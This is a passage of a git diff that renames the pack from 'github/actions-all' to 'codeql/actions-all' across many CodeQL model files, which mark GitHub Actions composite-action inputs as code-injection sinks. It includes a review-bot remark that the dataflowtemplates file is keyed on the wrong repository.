diff --git a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml index 0cfd7be68a3..0516493f6ba 100644 --- a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["freckle/stack-action", "*", "input.find-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml index 54a05620d90..62e64b63b44 100644 --- a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["freeradius/freeradius-server", "*", "input.gcc_ver", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml index e16f3fc74b3..e132ef1cee3 100644 --- a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml +++ b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gaphor/gaphor", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml index a3f692e7d2f..90d50a1b757 100644 --- a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["getsentry/action-release", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml index 5acd7348464..a8b9c41363e 100644 --- a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["github/codeql-action", "*", "input.latest_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml index 365dd90b120..75652ed69f9 100644 --- a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["github/ruby", "*", "input.builddir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml index 0d7a06175a5..973007c5490 100644 --- a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gittools/gitversion", "*", "input.distro", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml index 4c831ca673a..35a1a09df59 100644 --- a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml +++ b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["go-spatial/tegola", "*", "input.artifact_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml index 40b5f413d66..6b193462780 100644 --- a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml +++ b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["goauthentik/authentik", "*", "input.postgresql_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml index 565bd119df7..448f657d97e 100644 --- a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml +++ b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["godotengine/godot", "*", "input.bin", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml index 31157d853d0..009f4f1ef08 100644 --- a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml +++ b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["google/dagger", "*", "input.agp", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml index 6208b63b89a..bcb88287215 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["googleapis/java-cloud-bom", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml index 1073ddd49c1..8476c40ceaf 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["googleapis/sdk-platform-java", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml index 2b71886a286..462489a4c51 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml 
@@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["googlecloudplatform/magic-modules", "*", "output.changed-files", "filename", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml index 547bcca2ec9..56b354c870e 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml index e8ed66af89a..9fbb4108868 100644 --- a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gravitational/teleport", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml index af1327f7d7f..5fc85d3530e 100644 --- a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml +++ b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml 
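Review bot: In `googlecloudplatform_dataflowtemplates.model.yml` both data rows are keyed on `googlecloudplatform/magic-modules`, not on the repository the file is named for, and the pack rename leaves that unchanged. The `input.repo` code-injection row duplicates the one in `googlecloudplatform_magic-modules.model.yml` in the next file section, so this file appears to add no sink or source model for the dataflowtemplates composite actions. If the generator wrote the wrong key, workflows that pass untrusted input to those actions would not be flagged. Check the first column against the generator's input and regenerate the file, or drop it if it is a stray copy, rather than carrying it into `codeql/actions-all` as is.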
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["grote/transportr", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml index 887743c2c70..b0b36e7bd36 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/nomad", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml index ff7e51e477a..cb2c50f440c 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform", "*", "input.target-terraform-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml index 55d0ddfba22..7ac5c21a613 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml 
@@ -1,12 +1,12 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/vault", "*", "input.destination", "code-injection", "generated"] - ["hashicorp/vault", "*", "input.version", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["hashicorp/vault", "*", "input.vault-version", "output.vault-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml index d4c0823c2ec..1276334381d 100644 --- a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["home-assistant/android", "*", "input.lokalise-token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml index 7d789ec3ccc..0fc27163dd0 100644 --- a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["homebrew/actions", "*", "input.casks", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml index 2aa6633d752..ae994dbad1a 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hyperledger/aries-cloudagent-python", "*", "input.TEST_SCOPE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml index 536e6d914a2..6930bfed43f 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hyperledger/fabric-samples", "*", "input.ca-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml index 45bfb025ac9..94a802aa36f 100644 --- a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml +++ b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["igniterealtime/openfire", "*", "input.domain", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml index bba69dfc7a0..04246517883 100644 --- a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["infracost/actions", "*", "input.behavior", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml index 0fbc67e2b1b..2dd758bbccb 100644 --- a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml +++ b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["inspektor-gadget/inspektor-gadget", "*", "input.runtime", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml index 6c6a4264d51..5764bab2ebb 100644 --- a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml +++ b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["intel-analytics/ipex-llm", "*", "input.extra-dependency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml index ee18012a8f5..bbf2f0dc3de 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ionic-team/ionic-framework", "*", "input.totalShards", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml index 3dc39052707..de80b5607d8 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ionic-team/ionicons", "*", "input.paths", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml index b98826b9f02..ce748cd8fc9 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ionic-team/stencil", "*", "input.paths", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml index d000c5eb4d5..ae43fb8964d 100644 --- a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml +++ b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ipfs/aegir", "*", "input.browser", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml index 409ef9564d3..06f888fdecf 100644 --- a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml +++ b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["jetbrains/jetbrainsruntime", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml index 60a79604580..170505a1901 100644 --- a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml +++ b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["jhipster/generator-jhipster", "*", "input.generator-path", "code-injection", "generated"] @@ -21,7 +21,7 @@ extensions: - ["jhipster/generator-jhipster", "*", "input.application-path", "code-injection", "generated"] - ["jhipster/generator-jhipster", "*", "input.extra-args", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["jhipster/generator-jhipster", "*", "input.skip-workflow", "output.skip-workflow", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml index 4effdea078e..3bc3b24cba8 100644 --- a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml +++ b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["jsocol/django-ratelimit", "*", "input.django-version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml index d2c44be6261..9ac0e61a028 100644 --- a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["juicedata/juicefs", "*", "input.compress", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml index 098782a6bef..2b22333ba02 100644 --- a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["jupyter/docker-stacks", "*", "input.variant", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml index e08f4ba9bc2..5277000b273 100644 --- a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml +++ b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["keycloak/keycloak", "*", "input.job-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml index 97326453158..e596c90c79d 100644 --- a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml +++ b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kserve/kserve", "*", "input.directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml index 8f6c13884c5..226fab0382b 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubeflow/katib", "*", "input.experiments", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml index f7f2f139e85..892cd78749b 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubeflow/training-operator", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml index 11b423e871c..f7bd2567ec8 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubernetes-sigs/karpenter", "*", "input.k8sVersion", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml index 954b2d05858..126bf5c28d7 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubernetes-sigs/kwok", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml index 6cdb74f1278..9ce67a2592d 100644 --- a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubescape/kubescape", "*", "input.ORIGINAL_TAG", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml index e6820c900e3..11e82c1bf24 100644 --- a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubeshop/botkube", "*", "input.username", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml index ba3ad6e8b0c..06418a823eb 100644 --- a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml +++ b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kyverno/kyverno", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml index 114b8ce168e..f2d07bc848d 100644 --- a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml +++ b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lancedb/lance", "*", "input.repo", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml index 834353d89a8..e1e80cb9eb6 100644 --- a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["launchdarkly/ios-client-sdk", "*", "input.ios-sim", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml index 1c903d71cbe..8a8760c9bf6 100644 --- a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml +++ b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["layer5labs/meshmap-snapshot", "*", "input.assetLocation", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml index c34200337f2..9374557b62a 100644 --- a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml +++ b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ldc-developers/ldc", "*", "input.cmake_flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml index 19d14bbe988..5a27009da98 100644 --- a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml +++ b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ledgerhq/ledger-live", "*", "input.os", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml index 0308c934d7e..6ca81714510 100644 --- a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml +++ b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lerna/lerna", "*", "input.install-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml index 6039a6c3628..0bd93295605 100644 --- a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml +++ b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml 
